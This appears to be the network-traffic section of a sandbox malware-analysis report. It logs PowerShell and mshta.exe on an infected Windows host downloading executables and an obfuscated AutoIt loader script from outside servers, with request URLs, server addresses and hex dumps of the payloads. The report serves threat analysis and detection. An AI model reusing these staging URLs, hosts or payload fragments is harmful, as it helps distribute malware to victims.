                                                                              Dec 18, 2024 21:00:18.433835983 CET1236INData Raw: 44 8b c2 48 8b d1 e8 05 00 00 00 48 83 c4 38 c3 48 89 5c 24 10 48 89 6c 24 18 48 89 4c 24 08 56 57 41 55 41 56 41 57 48 83 ec 50 4c 8d 2d 1a e5 0e 00 49 8b f1 49 8b cd 41 8b e8 48 8b fa e8 6d 02 00 00 4c 63 f8 41 83 ff ff 0f 84 ef 01 00 00 48 8b
                                                                              Data Ascii: DHH8H\$Hl$HL$VWAUAVAWHPL-IIAHmLcAH$E3D95JJ;;wX-3zQH?D$ LLHV-I


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.449744139.99.188.124808176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 18, 2024 21:00:26.896815062 CET164OUTGET /kiiMf HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: 139.99.188.124
                                                                              Connection: Keep-Alive
                                                                              Dec 18, 2024 21:00:28.391782045 CET1236INHTTP/1.1 200 OK
                                                                              Date: Wed, 18 Dec 2024 20:00:27 GMT
                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                              Last-Modified: Sun, 15 Dec 2024 10:29:42 GMT
                                                                              ETag: "da2a8-6294c8abc9816"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 893608
                                                                              Keep-Alive: timeout=5, max=100
                                                                              Connection: Keep-Alive
                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f1 5f 70 5a 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 e8 08 00 00 d8 04 00 00 00 00 00 fa 7f 02 00 00 10 00 00 00 00 09 00 00 00 40 00 00 10 [TRUNCATED]
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sDR*R*R*CP*S*_@a*_@*_@g*[j[*[jw*R+r**S*_@S*RP*S*RichR*PEL_pZ"@@@@|Ppq; [@.text `.rdata@@.datatR@.rsrcP<@@.relocqpr@B
                                                                              Dec 18, 2024 21:00:28.392292976 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 44 61 4c 00
                                                                              Data Ascii: DaLhC\YLhCKYNhC:YhC.Y<ChCYhCYQ>hCYsLQ@sLP9hC
                                                                              Dec 18, 2024 21:00:28.392304897 CET1236INData Raw: 1e 02 00 59 c3 e8 8e 47 01 00 68 c7 b7 43 00 e8 c9 1e 02 00 59 c3 e8 e4 28 00 00 68 cc b7 43 00 e8 b8 1e 02 00 59 c3 e8 ac 34 01 00 68 d1 b7 43 00 e8 a7 1e 02 00 59 c3 b9 04 84 4c 00 e8 32 01 01 00 68 e0 b7 43 00 e8 91 1e 02 00 59 c3 cc cc cc cc
                                                                              Data Ascii: YGhCY(hCY4hCYL2hCYSVWj[lKyNlN(V;Y_^[SV3Wj_NN(^^~^^^ ^$f^8NlF:^<^@FLFPFTFXF\F`Fdj
                                                                              Dec 18, 2024 21:00:28.393712044 CET1236INData Raw: 9c fc 00 00 89 5e 64 8b c6 89 5e 68 89 5e 70 89 5e 78 c7 46 7c 01 00 00 00 66 89 be 84 00 00 00 66 89 be 88 00 00 00 66 89 be 8a 00 00 00 66 89 be 8c 00 00 00 66 89 be 8e 00 00 00 89 be 9c 00 00 00 5f 89 9e 80 00 00 00 88 9e 98 00 00 00 c6 86 93
                                                                              Data Ascii: ^d^h^p^xF|fffff_^[UVW3j9~t.YtuLFGFxF~_^]Ytu>V6:V4YY^USjccYtVuW_^
                                                                              Dec 18, 2024 21:00:28.393724918 CET1236INData Raw: 45 f4 8b 55 0c 8b 4d 08 e9 23 ff ff ff 8b 45 fc eb e0 80 f9 18 75 ee 8b 0a 89 4d f0 eb e7 55 8b ec ff 75 08 b9 b0 77 4c 00 e8 79 0f 00 00 8b 0d 10 78 4c 00 8b 0c 81 8b 09 ff 71 1c 50 e8 7a 0c 00 00 6a 00 ff 75 0c 6a 07 ff 75 08 ff 15 84 05 49 00
                                                                              Data Ascii: EUM#EuMUuwLyxLqPzjujuI]UuwLAPPjjjuI]UQSVuwLuwLVEMIGIut-$xLtSuu\^[]
                                                                              Dec 18, 2024 21:00:28.396270990 CET1236INData Raw: ff 51 e9 48 9e 03 00 6a 01 e9 10 9e 03 00 55 8b ec 56 57 8b 7d 08 8b b7 c8 01 00 00 8b ce 89 4d 08 85 f6 74 3c 8b 45 0c 53 85 c0 74 08 3b b0 80 00 00 00 75 3e 8b 5e 04 85 db 0f 85 83 9e 03 00 8b 87 c8 01 00 00 3b f0 75 3e 8b 06 89 87 c8 01 00 00
                                                                              Data Ascii: QHjUVW}Mt<ESt;u>^;u>VEYt[jj7XI_^]uMt9t6UM$uE(@S]#E(VW} jQuWSuuQhIhpIPu
                                                                              Dec 18, 2024 21:00:28.396284103 CET1236INData Raw: c0 7e 03 89 41 60 8b 45 14 85 c0 7e 03 89 41 64 5d c2 14 00 55 8b ec 51 a1 10 78 4c 00 56 8b 75 08 57 6a 00 8b 04 b0 8b 38 57 e8 0b fb ff ff 83 7f 18 00 0f 85 c8 9b 03 00 8b 0d 34 78 4c 00 6a 03 5a 89 55 fc 3b ca 0f 8c ad 00 00 00 a1 24 78 4c 00
                                                                              Data Ascii: ~A`E~Ad]UQxLVuWj8W4xLjZU;$xL0F;G}VW~d~h~D~P>t6<I&uwLx4xLUBU;
                                                                              Dec 18, 2024 21:00:28.398332119 CET1236INData Raw: 83 24 88 00 83 7e 78 03 76 0f 8b 4e 78 8b 46 74 8b 44 88 fc 83 38 00 74 cf 5f 5e 5d c2 04 00 83 8e 98 00 00 00 ff 83 8e 94 00 00 00 ff e9 6a ff ff ff 55 8b ec 51 8b 0d 28 78 4c 00 56 57 39 0d 30 78 4c 00 75 6e 81 3d 34 78 4c 00 ff ff 00 00 0f 84
                                                                              Data Ascii: $~xvNxFtD8t_^]jUQ(xLVW90xLun=4xLhYE}P xL54xLF54xL$xL0xL9MIO_^]j^3;~$xL98u#h[Yt3F;|
                                                                              Dec 18, 2024 21:00:28.398341894 CET1236INData Raw: 47 44 8b 45 f4 2b 45 ec 6a 00 6a 11 89 47 48 ff 15 14 01 49 00 50 6a 30 ff 37 ff 15 88 06 49 00 6a ff 57 b9 b0 77 4c 00 e8 5c f9 ff ff 83 3d d4 77 4c 00 00 75 16 68 c7 13 40 00 6a 28 6a 00 6a 00 ff 15 18 07 49 00 a3 d4 77 4c 00 ff 05 d0 77 4c 00
                                                                              Data Ascii: GDE+EjjGHIPj07IjWwL\=wLuh@j(jjIwLwLwLj5xLG_^[] 3"'MPMRU}WwLxLt{xL3V0M8V:tV:9}t
                                                                              Dec 18, 2024 21:00:28.400845051 CET1236INData Raw: 00 00 00 0f 85 e2 9e 03 00 83 7b 50 ff 75 31 83 7b 54 ff 75 36 83 3e 00 74 0b 57 6a eb ff 36 ff 15 10 05 49 00 8d 4d 2c e8 34 1b 00 00 8b c7 5f 5e 5b 8b e5 5d c2 34 00 8a 45 f4 e9 74 ff ff ff ff 73 50 57 e8 ce 5b 08 00 eb c4 ff 73 54 57 e8 b7 59
                                                                              Data Ascii: {Pu1{Tu6>tWj6IM,4_^[]4EtsPW[sTWYeCC'CECcCCCCCGCCCClCCCCC+CCC2@pCC;CYCwC1@CCU}VuNlF`^f@h
                                                                              Dec 18, 2024 21:00:28.512388945 CET1236INData Raw: 08 74 f6 8b 40 10 c3 55 8b ec 56 8b f1 83 7e 04 00 75 12 ff 75 08 8b 0e e8 ec 1a 00 00 ff 46 04 5e 5d c2 04 00 80 7e 0d 00 75 29 57 6a 18 e8 80 d8 01 00 8b f8 59 85 ff 74 2b ff 75 08 83 67 08 00 8b cf e8 e5 16 00 00 8b 46 08 89 47 10 89 7e 08 5f
                                                                              Data Ascii: t@UV~uuF^]~u)WjYt+ugFG~_uNF3UED{wp[JD{hSUVW~]uUmUEx[J]}+}MM+]E;|;s_^[]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.449753139.99.188.124804484C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 18, 2024 21:00:33.526112080 CET76OUTGET /QWCheljD.txt HTTP/1.1
                                                                              Host: 139.99.188.124
                                                                              Connection: Keep-Alive
                                                                              Dec 18, 2024 21:00:35.038698912 CET1236INHTTP/1.1 200 OK
                                                                              Date: Wed, 18 Dec 2024 20:00:34 GMT
                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                              Last-Modified: Sun, 15 Dec 2024 10:29:42 GMT
                                                                              ETag: "12ec22-6294c8abc8478"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 1240098
                                                                              Keep-Alive: timeout=5, max=100
                                                                              Connection: Keep-Alive
                                                                              Content-Type: text/plain
                                                                              Data Raw: 46 75 6e 63 20 4e 75 74 72 69 74 69 6f 6e 53 70 65 65 64 4d 61 79 6f 72 46 61 6d 69 6c 69 65 73 28 24 53 6d 4b 69 73 73 2c 20 24 45 66 66 69 63 69 65 6e 74 6c 79 46 6f 72 6d 75 6c 61 2c 20 24 43 6f 6e 73 75 6c 74 69 6e 67 53 6f 72 74 73 4c 61 62 73 2c 20 24 66 75 72 74 68 65 72 74 65 72 72 6f 72 69 73 74 2c 20 24 42 49 4b 45 4f 43 43 55 52 52 45 4e 43 45 53 4c 49 47 48 54 2c 20 24 52 65 76 65 72 73 65 50 68 69 6c 69 70 70 69 6e 65 73 29 0a 24 50 64 42 6c 6f 63 6b 73 52 65 73 70 6f 6e 73 65 44 61 74 20 3d 20 27 37 33 39 31 31 39 36 31 38 37 37 32 27 0a 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 0a 24 69 6f 73 79 6d 70 68 6f 6e 79 73 65 65 6d 73 63 72 75 63 69 61 6c 20 3d 20 35 30 0a 46 6f 72 20 24 4f 64 48 42 74 20 3d 20 32 38 20 54 6f 20 38 36 35 0a 49 66 20 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 32 20 54 68 65 6e 0a 53 71 72 74 28 37 39 35 35 29 0a 46 69 6c 65 45 78 69 73 74 73 28 [TRUNCATED]
                                                                              Data Ascii: Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines)$PdBlocksResponseDat = '739119618772'$VerifiedUnderstoodValidation = 34$iosymphonyseemscrucial = 50For $OdHBt = 28 To 865If $VerifiedUnderstoodValidation = 32 ThenSqrt(7955)FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3))$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1EndIfIf $VerifiedUnderstoodValidation = 33 ThenConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5))DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2))Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1))$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1EndIfIf $VerifiedUndersto
                                                                              Dec 18, 2024 21:00:35.039026976 CET1236INData Raw: 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 20 54 68 65 6e 0a 24 4e 75 74 74 65 6e 49 6e 76 65 73 74 6f 72 73 52 61 6c 65 69 67 68 20 3d 20 44 65 63 28 57 61 6c 65 73 28 22 31 30 34 5d 31 31 33 5d 31 30 35 5d 38 36 5d 38 35 5d 39 36 5d 38
                                                                              Data Ascii: odValidation = 34 Then$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]83]73]78]127]105]97]79]105]77",28/4))ExitLoopEndIfNext$LAYERSSTRICTINNOVATIVE = '66150718350940696046327902621'$DmModsQueries = 68$DRESSDEARANTIQUES = 93Wh
                                                                              Dec 18, 2024 21:00:35.039045095 CET1236INData Raw: 6c 4c 69 62 72 61 72 69 61 6e 53 70 69 72 69 74 55 20 3d 20 24 54 68 65 6f 72 65 74 69 63 61 6c 4c 69 62 72 61 72 69 61 6e 53 70 69 72 69 74 55 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 54 68 65 6f 72 65 74 69 63 61 6c 4c 69 62 72 61 72 69 61
                                                                              Data Ascii: lLibrarianSpiritU = $TheoreticalLibrarianSpiritU + 1EndIfIf $TheoreticalLibrarianSpiritU = 18 Then$locateheadquarterssuccessfully = PixelGetColor(Wales("82]124]123]88]85]72]105]73]102]127]126]82]119",5/1), Wales("82]124]123]88]85]72]105]73]
                                                                              Dec 18, 2024 21:00:35.041174889 CET1236INData Raw: 37 29 29 0a 41 53 69 6e 28 39 39 32 29 0a 24 6d 69 73 73 69 6f 6e 73 67 72 65 65 6e 68 6f 75 73 65 20 3d 20 24 6d 69 73 73 69 6f 6e 73 67 72 65 65 6e 68 6f 75 73 65 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 6d 69 73 73 69 6f 6e 73 67 72 65 65
                                                                              Data Ascii: 7))ASin(992)$missionsgreenhouse = $missionsgreenhouse + 1EndIfIf $missionsgreenhouse = 96 Then$broughtisnicholasearned = ASin(9631)ExitLoopEndIfIf $missionsgreenhouse = 97 ThenDriveStatus(Wales("87]120]118]101]109]107]108]120]39",24/6
                                                                              Dec 18, 2024 21:00:35.041194916 CET1236INData Raw: 38 32 30 39 32 34 34 35 32 39 39 32 31 34 37 37 33 30 37 33 33 38 33 32 39 35 39 38 31 37 38 33 37 31 39 31 34 39 36 37 34 34 35 38 38 30 38 27 0a 24 44 49 4c 44 4f 53 59 49 45 4c 44 53 46 41 52 45 41 44 44 52 45 53 53 45 44 20 3d 20 33 36 0a 24
                                                                              Data Ascii: 82092445299214773073383295981783719149674458808'$DILDOSYIELDSFAREADDRESSED = 36$PERFECTRYAN = 64For $mdowmhS = 37 To 500If $DILDOSYIELDSFAREADDRESSED = 35 ThenPixelGetColor(107, 354, 0)Dec(Wales("76]97]107]101]115]42]73]110]115]116]97]11
                                                                              Dec 18, 2024 21:00:35.043263912 CET1236INData Raw: 38 29 0a 44 72 69 76 65 53 74 61 74 75 73 28 57 61 6c 65 73 28 22 39 33 5d 31 31 37 5d 31 32 33 5d 31 31 36 5d 31 30 36 5d 35 33 22 2c 33 30 2f 35 29 29 0a 43 68 72 28 38 37 37 39 29 0a 24 4c 65 73 73 50 68 6f 6e 65 20 3d 20 24 4c 65 73 73 50 68
                                                                              Data Ascii: 8)DriveStatus(Wales("93]117]123]116]106]53",30/5))Chr(8779)$LessPhone = $LessPhone + 1EndIfIf $LessPhone = 28 Then$adipexeditcarl = DriveStatus(Wales("79]104]75]82]80]116]89]86]125]114]75]75]81]125]90]115]95]79]128",56/8))ExitLoopEndIf
                                                                              Dec 18, 2024 21:00:35.043282986 CET1236INData Raw: 73 74 65 64 44 69 65 44 6f 63 73 20 2b 20 31 0a 45 6e 64 49 66 0a 57 45 6e 64 0a 24 54 61 62 6c 65 44 69 73 63 75 73 73 65 73 52 61 70 69 64 6c 79 48 69 73 74 6f 72 69 63 61 6c 20 3d 20 27 39 38 37 37 37 39 35 31 33 37 30 34 33 31 35 32 31 31 36
                                                                              Data Ascii: stedDieDocs + 1EndIfWEnd$TableDiscussesRapidlyHistorical = '9877795137043152116883331283765251278672396181174893270'$COACHCELLULAR = 24$AIMEDSENZSHOPSMIXER = 90For $hIEQQvE = 18 To 472If $COACHCELLULAR = 23 ThenACos(2564)Chr(8142)ASi
                                                                              Dec 18, 2024 21:00:35.045521975 CET1000INData Raw: 6e 65 4c 69 63 65 6e 73 65 20 2b 20 31 0a 45 6e 64 49 66 0a 57 45 6e 64 0a 24 42 61 73 6b 65 74 73 4e 65 61 72 43 75 62 61 20 3d 20 27 35 35 38 34 37 38 32 34 35 37 35 34 32 36 31 37 30 36 32 37 31 38 32 31 30 30 30 38 27 0a 24 48 65 72 65 62 79
                                                                              Data Ascii: neLicense + 1EndIfWEnd$BasketsNearCuba = '5584782457542617062718210008'$HerebyFaq = 55$MultiCordlessFlexRepublicans = 73While 548If $HerebyFaq = 54 ThenACos(3326)ATan(8817)Dec(Wales("78]105]124]40]40]40]40",56/7))$HerebyFaq = $Hereb
                                                                              Dec 18, 2024 21:00:35.045542955 CET1236INData Raw: 5d 31 32 35 5d 31 30 38 5d 31 31 33 5d 31 31 30 5d 31 32 34 5d 31 30 33 5d 31 32 31 5d 31 32 30 5d 31 32 34 5d 31 31 34 5d 31 32 35 5d 31 31 34 5d 31 32 30 5d 31 31 39 5d 31 31 34 5d 31 31 39 5d 31 31 32 5d 31 30 33 22 2c 34 35 2f 35 29 29 0a 50
                                                                              Data Ascii: ]125]108]113]110]124]103]121]120]124]114]125]114]120]119]114]119]112]103",45/5))PixelGetColor(111, 395, 0)$IllnessFolk = $IllnessFolk + 1EndIfNextFunc BukkakeButterRebound($DISPLAYEDACIDSVERMONTFREDERICK, $AIRCRAFTSCANNEDMAINTAIN)$Immedi
                                                                              Dec 18, 2024 21:00:35.047631979 CET1236INData Raw: 30 0a 46 6f 72 20 24 48 79 52 58 65 76 4d 20 3d 20 35 36 20 54 6f 20 33 33 30 0a 49 66 20 24 52 45 4a 45 43 54 52 45 53 45 52 56 4f 49 52 4c 4f 43 4b 45 4e 4a 4f 59 45 44 20 3d 20 38 37 20 54 68 65 6e 0a 45 78 70 28 32 30 31 36 29 0a 50 69 78 65
                                                                              Data Ascii: 0For $HyRXevM = 56 To 330If $REJECTRESERVOIRLOCKENJOYED = 87 ThenExp(2016)PixelGetColor(Wales("66]111]98]109]112]104]34]71]102]98]117]34]66]109]104]102]115]106]98]34]83]102]99]112]118]111]101]34",2/2), Wales("66]111]98]109]112]104]34]71]10
                                                                              Dec 18, 2024 21:00:35.158946037 CET1236INData Raw: 32 2c 20 30 29 0a 41 43 6f 73 28 34 33 35 36 29 0a 24 56 61 63 61 6e 63 69 65 73 4c 61 75 64 65 72 64 61 6c 65 42 69 72 6d 69 6e 67 68 61 6d 4c 61 6e 64 73 20 3d 20 24 56 61 63 61 6e 63 69 65 73 4c 61 75 64 65 72 64 61 6c 65 42 69 72 6d 69 6e 67
                                                                              Data Ascii: 2, 0)ACos(4356)$VacanciesLauderdaleBirminghamLands = $VacanciesLauderdaleBirminghamLands + 1EndIfIf $VacanciesLauderdaleBirminghamLands = 28 Then$DiscoIllegal = 29$SubstituteVancouverBeta = 77For $qgBSwQeo = 86 To 289If $DiscoIllegal =


                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449730147.45.49.1554434412C:\Windows\System32\mshta.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 20:00:12 UTC328OUTGET /ghep1 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-CH
                                                                              UA-CPU: AMD64
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                              Host: tiffany-careers.com
                                                                              Connection: Keep-Alive
                                                                              2024-12-18 20:00:13 UTC396INHTTP/1.1 200 OK
                                                                              etag: "14f2c-675eb19f-2534e;;;"
                                                                              last-modified: Sun, 15 Dec 2024 10:38:23 GMT
                                                                              content-length: 85804
                                                                              accept-ranges: bytes
                                                                              date: Wed, 18 Dec 2024 20:00:13 GMT
                                                                              server: LiteSpeed
                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                              connection: close
                                                                              2024-12-18 20:00:13 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 13 b2 ed 95 57 d3 83 c6 57 d3 83 c6 57 d3 83 c6 43 b8 86 c7 56 d3 83 c6 43 b8 80 c7 55 d3 83 c6 43 b8 87 c7 43 d3 83 c6 43 b8 82 c7 50 d3 83 c6 57 d3 82 c6 73 d3 83 c6 43 b8 8a c7 56 d3 83 c6 43 b8 7c c6 56 d3 83 c6 43 b8 81 c7 56 d3 83 c6 52 69 63 68 57 d3 83 c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 43 9e 30 35 00 00 00
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$WWWCVCUCCCPWsCVC|VCVRichWPELC05
                                                                              2024-12-18 20:00:13 UTC16384INData Raw: 32 2e 64 6c 6c 00 00 6f 00 5f 58 63 70 74 46 69 6c 74 65 72 00 c9 00 5f 5f 70 5f 5f 63 6f 6d 6d 6f 64 65 00 00 11 01 5f 61 6d 73 67 5f 65 78 69 74 00 00 a1 00 5f 5f 67 65 74 6d 61 69 6e 61 72 67 73 00 e2 00 5f 5f 73 65 74 5f 61 70 70 5f 74 79 70 65 00 00 ae 04 65 78 69 74 00 00 73 01 5f 65 78 69 74 00 24 01 5f 63 65 78 69 74 00 00 ce 00 5f 5f 70 5f 5f 66 6d 6f 64 65 00 00 07 02 5f 69 73 6d 62 62 6c 65 61 64 00 00 e4 00 5f 5f 73 65 74 75 73 65 72 6d 61 74 68 65 72 72 00 00 e8 01 5f 69 6e 69 74 74 65 72 6d 00 f7 00 5f 61 63 6d 64 6c 6e 00 35 00 3f 74 65 72 6d 69 6e 61 74 65 40 40 59 41 58 58 5a 00 6d 73 76 63 72 74 2e 64 6c 6c 00 00 37 01 5f 63 6f 6e 74 72 6f 6c 66 70 00 00 6a 01 5f 65 78 63 65 70 74 5f 68 61 6e 64 6c 65 72 34 5f 63 6f 6d 6d 6f 6e 00 7f 05
                                                                              Data Ascii: 2.dllo_XcptFilter__p__commode_amsg_exit__getmainargs__set_app_typeexits_exit$_cexit__p__fmode_ismbblead__setusermatherr_initterm_acmdln5?terminate@@YAXXZmsvcrt.dll7_controlfpj_except_handler4_common
                                                                              2024-12-18 20:00:13 UTC16384INData Raw: 50 2c 67 49 2c 54 44 2c 67 49 2c 63 65 2c 41 50 2c 67 49 2c 41 50 2c 75 61 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 67 49 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 41 50 2c 63 65 2c 4e 6e 2c 4e 6e 2c 4e 6e 2c 63 65 2c 41 50 2c 67 49 2c 41 50 2c 4e 6e 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 4f 7a 2c 63 65 2c 4e 6e 2c 4e 6e 2c 6c 73 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 45 6a 2c 63 65 2c 41 50 2c 67 49 2c 41 50 2c 6c 73 2c 63 65 2c 4e 6e 2c 4e 6e 2c 4e 6e 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 69 52 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 54 44 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 45 6a 2c 63 65 2c 4e 6e 2c 4e 6e 2c 4e 6e 2c 63 65 2c 4e 6e 2c 4e 6e 2c 4e 6e 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 67 49 2c 63 65 2c 41 50 2c 67 49 2c 41 50 2c 5a 6c 2c 63 65 2c 41
                                                                              Data Ascii: P,gI,TD,gI,ce,AP,gI,AP,ua,ce,AP,gI,gI,gI,ce,AP,gI,gI,AP,ce,Nn,Nn,Nn,ce,AP,gI,AP,Nn,ce,AP,gI,gI,Oz,ce,Nn,Nn,ls,ce,AP,gI,gI,Ej,ce,AP,gI,AP,ls,ce,Nn,Nn,Nn,ce,AP,gI,gI,iR,ce,AP,gI,gI,TD,ce,AP,gI,gI,Ej,ce,Nn,Nn,Nn,ce,Nn,Nn,Nn,ce,AP,gI,gI,gI,ce,AP,gI,AP,Zl,ce,A
                                                                              2024-12-18 20:00:14 UTC16384INData Raw: 2c 41 50 2c 67 49 2c 67 49 2c 41 50 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 67 49 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 41 50 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 54 44 2c 63 65 2c 41 50 2c 67 49 2c 54 44 2c 67 49 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 69 52 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 41 50 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 69 52 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 45 6a 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 5a 6c 2c 63 65 2c 41 50 2c 67 49 2c 41 50 2c 4e 6e 2c 63 65 2c 41 50 2c 67 49 2c 41 50 2c 75 61 2c 63 65 2c 41 50 2c 67 49 2c 41 50 2c 6c 73 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 54 44 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 45 6a 2c 63 65 2c 41 50 2c 67 49 2c 67 49 2c 45 6a 2c 63 65 2c 41 50 2c 67 49 2c 41 50 2c 5a 6c 2c 63 65
                                                                              Data Ascii: ,AP,gI,gI,AP,ce,AP,gI,gI,gI,ce,AP,gI,gI,AP,ce,AP,gI,gI,TD,ce,AP,gI,TD,gI,ce,AP,gI,gI,iR,ce,AP,gI,gI,AP,ce,AP,gI,gI,iR,ce,AP,gI,gI,Ej,ce,AP,gI,gI,Zl,ce,AP,gI,AP,Nn,ce,AP,gI,AP,ua,ce,AP,gI,AP,ls,ce,AP,gI,gI,TD,ce,AP,gI,gI,Ej,ce,AP,gI,gI,Ej,ce,AP,gI,AP,Zl,ce
                                                                              2024-12-18 20:00:14 UTC16384INData Raw: 00 e0 00 02 01 0b 01 0e 14 00 10 00 00 00 16 00 00 00 00 00 00 40 16 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 0a 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 0d 5f 00 00 02 00 40 c1 00 00 04 00 00 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 30 00 00 50 00 00 00 00 40 00 00 e8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 01 00 00 d0 11 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 10 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 0e 00 00 00 10 00 00 00 10 00 00 00 04 00 00 00 00
                                                                              Data Ascii: @ @`_@ 0P@P@T0.textt
